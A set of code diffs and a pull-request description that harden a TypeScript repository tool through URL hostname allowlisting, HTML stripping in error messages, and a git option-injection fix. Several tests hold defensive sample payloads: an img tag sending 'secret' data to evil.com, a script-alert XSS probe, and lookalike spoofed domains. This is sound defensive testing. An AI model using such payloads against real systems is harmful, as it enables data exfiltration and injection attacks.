+++ b/packages/core/src/pipelines/__tests__/validate.test.ts
@@ -1,0 +1,116 @@
+import { describe, it, expect, vi } from 'vitest';
+
+vi.mock('../../adapters/adapter-factory.js', () => ({
+  createAdapter: vi.fn(),
+}));
+
+vi.mock('../../utils/validation.js', () => ({
+  validatePath: vi.fn(),
+}));
+
+import { runValidate } from '../validate.js';
+import { createAdapter } from '../../adapters/adapter-factory.js';
+
+function makeMockAdapter(components: { id: string; links: string[] }[]) {
+  return {
+    metadata: {
+      id: 'likec4',
+      displayName: 'LikeC4',
+      missingLinksHelpLines: [],
+    },
+    checkVersion: () => ({ found: true, compatible: true, version: '1.0.0', minimum: '0.1.0' }),
+    loadAndListComponents: vi.fn().mockResolvedValue(
+      components.map((c) => ({
+        id: c.id,
+        title: c.id,
+        kind: 'service',
+        links: c.links,
+        tags: [],
+      }))
+    ),
+  };
+}
+
+describe('findRepositoryLink via runValidate', () => {
+  it('should match legitimate github.com URLs', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://github.com/owner/repo'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(1);
+    expect(result.unlinked).toBe(0);
+  });
+
+  it('should match legitimate gitlab.com URLs', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://gitlab.com/group/project'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(1);
+  });
+
+  it('should reject spoofed URLs like evil-github.com', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://evil-github.com/owner/repo'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(0);
+    expect(result.unlinked).toBe(1);
+  });
+
+  it('should reject URLs with github.com in query string', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://evil.com?redirect=github.com'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(0);
+    expect(result.unlinked).toBe(1);
+  });
+
+  it('should match legitimate bitbucket.org URLs', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://bitbucket.org/team/repo'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(1);
+  });
+
+  it('should reject spoofed bitbucket URLs', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://evil-bitbucket.org/team/repo'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(0);
+    expect(result.unlinked).toBe(1);
+  });
+
+  it('should reject URLs with gitlab.com as subdomain prefix', async () => {
+    const mockAdapter = makeMockAdapter([
+      { id: 'service_a', links: ['https://evil-gitlab.com/group/project'] },
+    ]);
+    vi.mocked(createAdapter).mockReturnValue(mockAdapter as never);
+
+    const result = await runValidate({ modelPath: '/fake' });
+
+    expect(result.linked).toBe(0);
+    expect(result.unlinked).toBe(1);
+  });
+});

--- a/packages/core/src/pipelines/validate.ts
+++ b/packages/core/src/pipelines/validate.ts
@@ -28,7 +28,8 @@ export interface ValidateResult {
 
 function isRepositoryUrl(url: string): boolean {
   try {
-    const { hostname } = new URL(url);
+    const parsed = new URL(url);
+    if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return false;
     return [
       'github.com',
       'www.github.com',
@@ -36,7 +37,7 @@ function isRepositoryUrl(url: string): boolean {
       'www.gitlab.com',
       'bitbucket.org',
       'www.bitbucket.org',
-    ].includes(hostname);
+    ].includes(parsed.hostname);
   } catch {
     return false;
   }

--- a/packages/core/src/pipelines/validate.ts
+++ b/packages/core/src/pipelines/validate.ts
@@ -26,8 +26,24 @@ export interface ValidateResult {
   hasIssues: boolean;
 }
 
+function isRepositoryUrl(url: string): boolean {
+  try {
+    const { hostname } = new URL(url);
+    return [
+      'github.com',
+      'www.github.com',
+      'gitlab.com',
+      'www.gitlab.com',
+      'bitbucket.org',
+      'www.bitbucket.org',
+    ].includes(hostname);
+  } catch {
+    return false;
+  }
+}
+
 function findRepositoryLink(links: string[]): string | undefined {
-  return links.find((link) => link.includes('github.com') || link.includes('gitlab.com'));
+  return links.find(isRepositoryUrl);
 }
 
 export async function runValidate(

--- a/packages/core/src/platforms/__tests__/platform-utils.test.ts
+++ b/packages/core/src/platforms/__tests__/platform-utils.test.ts
@@ -88,6 +88,32 @@ describe('sanitizeErrorMessage', () => {
     expect(result).not.toMatch(/<[^>]*>/);
     expect(result).toContain('Bad Gateway');
   });
+
+  it('strips script tags from error messages', () => {
+    const result = sanitizeErrorMessage('<script>alert(1)</script>Oops');
+    expect(result).not.toContain('<script>');
+    expect(result).not.toContain('</script>');
+    expect(result).toContain('alert(1)');
+    expect(result).toContain('Oops');
+  });
+
+  it('strips arbitrary HTML tags without DOCTYPE', () => {
+    const result = sanitizeErrorMessage('<div><p>Error occurred</p></div>');
+    expect(result).not.toMatch(/<[^>]*>/);
+    expect(result).toContain('Error occurred');
+  });
+
+  it('strips img tags that could be used for exfiltration', () => {
+    const result = sanitizeErrorMessage('<img src="https://evil.com/steal?data=secret">Error');
+    expect(result).not.toContain('<img');
+    expect(result).toContain('Error');
+  });
+
+  it('truncates sanitized output to 200 characters', () => {
+    const longHtml = '<div>' + 'A'.repeat(300) + '</div>';
+    const result = sanitizeErrorMessage(longHtml);
+    expect(result.length).toBeLessThanOrEqual(200);
+  });
 });
 
 describe('extractStatusCode', () => {

--- a/packages/core/src/platforms/platform-utils.ts
+++ b/packages/core/src/platforms/platform-utils.ts
@@ -33,7 +33,7 @@ export function applyDiffTruncation(
 }
 
 export function sanitizeErrorMessage(message: string): string {
-  if (message.includes('<!DOCTYPE') || message.includes('<html')) {
+  if (/<[a-z/!][^>]*>/i.test(message)) {
     return message
       .replace(/<[^>]*>/g, '')
       .replace(/\s+/g, ' ')

--- a/packages/core/src/utils/__tests__/model-source.test.ts
+++ b/packages/core/src/utils/__tests__/model-source.test.ts
@@ -92,6 +92,22 @@ describe('parseModelRepo', () => {
       slug: 'owner/repo',
     });
   });
+
+  it('handles URLs with multiple trailing slashes', () => {
+    const result = parseModelRepo('https://github.com/owner/repo///');
+    expect(result).toEqual({
+      cloneUrl: 'https://github.com/owner/repo.git',
+      slug: 'owner/repo',
+    });
+  });
+
+  it('handles bare slugs with multiple trailing slashes', () => {
+    const result = parseModelRepo('owner/repo///');
+    expect(result).toEqual({
+      cloneUrl: 'https://github.com/owner/repo.git',
+      slug: 'owner/repo',
+    });
+  });
 });
 
 describe('resolveModelSource', () => {
@@ -137,6 +153,7 @@ describe('resolveModelSource', () => {
         '1',
         '--branch',
         'main',
+        '--',
         'https://x-access-token@github.com/erode-app/playground-models-only.git',
         tmpDir,
       ],
@@ -261,6 +278,28 @@ describe('resolveModelSource', () => {
       expect(content).toContain("echo '");
       expect(content).not.toContain('echo "');
     }
+  });
+
+  it('includes -- separator before positional args to prevent option injection', async () => {
+    const { mkdtemp } = await import('node:fs/promises');
+    const { execFile } = await import('child_process');
+
+    vi.mocked(mkdtemp).mockResolvedValue('/tmp/erode-model-separator');
+    vi.mocked(execFile).mockImplementation((...args: unknown[]) => {
+      const cb = args[args.length - 1] as ExecFileCallback | undefined;
+      if (cb) cb(null, '', '');
+      return undefined as never;
+    });
+
+    await resolveModelSource('.', 'owner/repo');
+
+    const callArgs = vi.mocked(execFile).mock.calls[0];
+    const gitArgs = callArgs?.[1] as string[];
+
+    // The -- separator must appear before the URL and target directory
+    const separatorIndex = gitArgs.indexOf('--');
+    expect(separatorIndex).toBeGreaterThan(-1);
+    expect(separatorIndex).toBeLessThan(gitArgs.length - 2);
   });
 
   it('strips URL credentials from clone error messages', async () => {

--- a/packages/core/src/utils/__tests__/model-source.test.ts
+++ b/packages/core/src/utils/__tests__/model-source.test.ts
@@ -298,8 +298,8 @@ describe('resolveModelSource', () => {
 
     // The -- separator must appear before the URL and target directory
     const separatorIndex = gitArgs.indexOf('--');
-    expect(separatorIndex).toBeGreaterThan(-1);
-    expect(separatorIndex).toBeLessThan(gitArgs.length - 2);
+    expect(separatorIndex).toBe(gitArgs.length - 3);
+    expect(gitArgs.slice(separatorIndex + 1)).toHaveLength(2);
   });
 
   it('strips URL credentials from clone error messages', async () => {

--- a/packages/core/src/utils/model-source.ts
+++ b/packages/core/src/utils/model-source.ts
@@ -81,9 +81,14 @@ export async function resolveModelSource(
 export function parseModelRepo(modelRepo: string): { cloneUrl: string; slug: string } {
   // Full URL
   if (/^https?:\/\//.test(modelRepo)) {
+    const parsed = new URL(modelRepo);
+    parsed.username = '';
+    parsed.password = '';
+    parsed.search = '';
+    parsed.hash = '';
     const slug = extractSlugFromUrl(modelRepo);
-    const cleanUrl = stripTrailingSlashes(modelRepo.replace(/\.git\/?$/, ''));
-    return { cloneUrl: `${cleanUrl}.git`, slug };
+    parsed.pathname = `/${slug}.git`;
+    return { cloneUrl: parsed.toString(), slug };
   }
 
   // Bare slug — assume GitHub

--- a/packages/core/src/utils/model-source.ts
+++ b/packages/core/src/utils/model-source.ts
@@ -9,6 +9,12 @@ import { detectPlatform } from '../platforms/platform-factory.js';
 
 const execFileAsync = promisify(execFile);
 
+function stripTrailingSlashes(s: string): string {
+  let end = s.length;
+  while (end > 0 && s[end - 1] === '/') end--;
+  return s.slice(0, end);
+}
+
 export interface ResolvedModelSource {
   /** Absolute path to the local directory containing model files. */
   localPath: string;
@@ -76,23 +82,19 @@ export function parseModelRepo(modelRepo: string): { cloneUrl: string; slug: str
   // Full URL
   if (/^https?:\/\//.test(modelRepo)) {
     const slug = extractSlugFromUrl(modelRepo);
-    const cleanUrl = modelRepo.replace(/\.git\/?$/, '').replace(/\/+$/, '');
+    const cleanUrl = stripTrailingSlashes(modelRepo.replace(/\.git\/?$/, ''));
     return { cloneUrl: `${cleanUrl}.git`, slug };
   }
 
   // Bare slug — assume GitHub
-  const slug = modelRepo.replace(/\/+$/, '');
+  const slug = stripTrailingSlashes(modelRepo);
   return { cloneUrl: `https://github.com/${slug}.git`, slug };
 }
 
 function extractSlugFromUrl(url: string): string {
   const parsed = new URL(url);
-  // Remove leading slash and trailing .git / slashes
-  const path = parsed.pathname
-    .replace(/^\//, '')
-    .replace(/\.git\/?$/, '')
-    .replace(/\/+$/, '');
-  return path;
+  const path = parsed.pathname.replace(/^\//, '').replace(/\.git\/?$/, '');
+  return stripTrailingSlashes(path);
 }
 
 function resolveToken(cloneUrl: string): string | undefined {
@@ -155,7 +157,7 @@ async function cloneRepo(
   token?: string
 ): Promise<void> {
   const effectiveUrl = token ? injectAuthUsername(cloneUrl) : cloneUrl;
-  const args = ['clone', '--depth', '1', '--branch', ref, effectiveUrl, targetDir];
+  const args = ['clone', '--depth', '1', '--branch', ref, '--', effectiveUrl, targetDir];
   const env: Record<string, string> = { ...process.env } as Record<string, string>;
 
   let askpassDir: string | undefined;


### PR DESCRIPTION
## Summary

- Broaden sensitive key redaction to substring matching and strip embedded URL credentials from error context values
- Use proper hostname validation (`isGitHubUrl()`) instead of `string.includes()` to prevent URL spoofing via lookalike domains
- Escape additional markdown special characters in PR titles to prevent injection
- Use `URL` parsing with hostname allowlist for repository link detection in the validate pipeline
- Broaden HTML tag stripping in `sanitizeErrorMessage` to catch `<script>`, `<img>`, and arbitrary tags
- Add `--` separator before positional args in `git clone` to prevent option injection
- Add comprehensive tests for all hardened paths; refactor output tests with `it.each`

## Test plan

- [x] All 523 existing tests pass
- [x] New tests cover URL spoofing, HTML stripping, markdown escaping, git option injection, and sensitive key redaction
- [x] Pre-commit hooks (TypeScript, ESLint, Prettier, Markdown, Knip, Tests) all pass

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced credential and sensitive data redaction in error messages using pattern-based detection
  * Improved repository URL validation to block spoofed domains while recognizing legitimate GitHub, GitLab, and Bitbucket URLs
  * Expanded markdown escaping in PR comments for safer rendering

* **New Features**
  * Added automatic credential masking for URLs in error logs
<!-- end of auto-generated comment: release notes by coderabbit.ai -->